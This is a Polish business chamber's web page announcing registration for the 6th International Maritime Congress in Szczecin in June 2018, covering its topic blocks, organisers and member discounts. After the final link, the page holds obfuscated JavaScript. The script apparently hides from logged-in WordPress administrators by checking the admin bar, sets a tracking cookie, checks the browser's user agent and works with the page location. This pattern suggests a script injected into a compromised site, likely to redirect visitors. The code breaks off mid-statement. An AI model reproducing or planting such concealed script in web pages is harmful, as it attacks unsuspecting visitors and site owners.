6. Międzynarodowy Kongres Morski w Szczecinie: 15 i 16 czerwca 2018r. | Północna Izba Gospodarcza w Koszalinie

  1. Międzynarodowy Kongres Morski w Szczecinie: 15 i 16 czerwca 2018r. Ruszyła rejestracja.

 

Gospodarka morska, inwestycje w nadmorskie nieruchomości, edukacja, innowacje, ekologia… To tylko niektóre tematy szóstej edycji wydarzenia, które przyciągnie do Szczecina przedsiębiorców, menedżerów, ekspertów i decydentów z Polski i Europy. Już teraz zachęcamy do udziału w nim członków Północnej Izby Gospodarczej w Szczecinie.

 

Szeroka tematyka tegorocznego Kongresu sprawi, że będzie on atrakcyjnym miejscem spotkań, wymiany doświadczeń i wiedzy dla przedsiębiorców z różnych branż. Wydarzenie rozpocznie się od  panelu dotyczącego perspektyw rozwoju turystyki morskiej. Zagadnienie to będzie rozpatrywane z punktu widzenia przedsiębiorców inwestujących w infrastrukturę hotelową i apartamentową na wybrzeżu, ale również samorządów i rządu. Program obejmuje również debatę plenarną (jej tytuł zostanie zaprezentowany już niebawem), po której uczestnicy będą mieli do wyboru trzy bloki tematyczne:

 

  • Żegluga, porty i stocznie
  • Edukacja i innowacje
  • Rybołówstwo i ekologia

 

W każdym przewidziano po kilka tematów, które omawiane będą podczas paneli, do udziału w których zaproszeni zostali, w roli prelegentów i ekspertów, prezesi wiodących firm działających w danych obszarach, ministrowie, samorządowcy i naukowcy.

 

Od początku za cel nadrzędny organizatorzy Kongresu postawili sobie praktyczność. Poruszane podczas obrad kwestie i wnioski płynące z dyskusji nie są teoretycznymi rozważaniami. Jako konkretne postulaty trafiają one później na biurka osób decyzyjnych w państwie.

 

  1. Międzynarodowy Kongres Morski towarzyszył będzie obchodom Światowych Dni Morza, które odbędą się w dniach 13-16 czerwca br. w Szczecinie w związku z 70-leciem Międzynarodowej Organizacji Morskiej IMO.

 

Organizatorem kongresu jest Fundacja Kongres Morski, której fundatorami są Północna Izba Gospodarcza i Polska Żegluga Morska. Swój wkład w prace nad Kongresem ma również Ministerstwo Gospodarki Morskiej i Żeglugi Śródlądowej, którego przedstawiciele uczestniczyli w kształtowaniu programu Kongresu, a przede wszystkim w wykorzystywaniu w pracach resortu wniosków i postulatów przekazywanych przez uczestników poprzednich edycji wydarzenia.

 

Członkowie Północnej Izby Gospodarczej mogą skorzystać z preferencyjnych warunków uczestnictwa w 6. Międzynarodowym Kongresie Morskim w Szczecinie. Więcej informacji: mr@izba.info

 

Program Kongresu>>  Harmonogam 6. Międzynarodowego Kongresu Morskiego

Formularz Rejestracyjny>>    www.kongres-morski.pl/info/rejestracja/

 

www.kongres-morski.pl 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m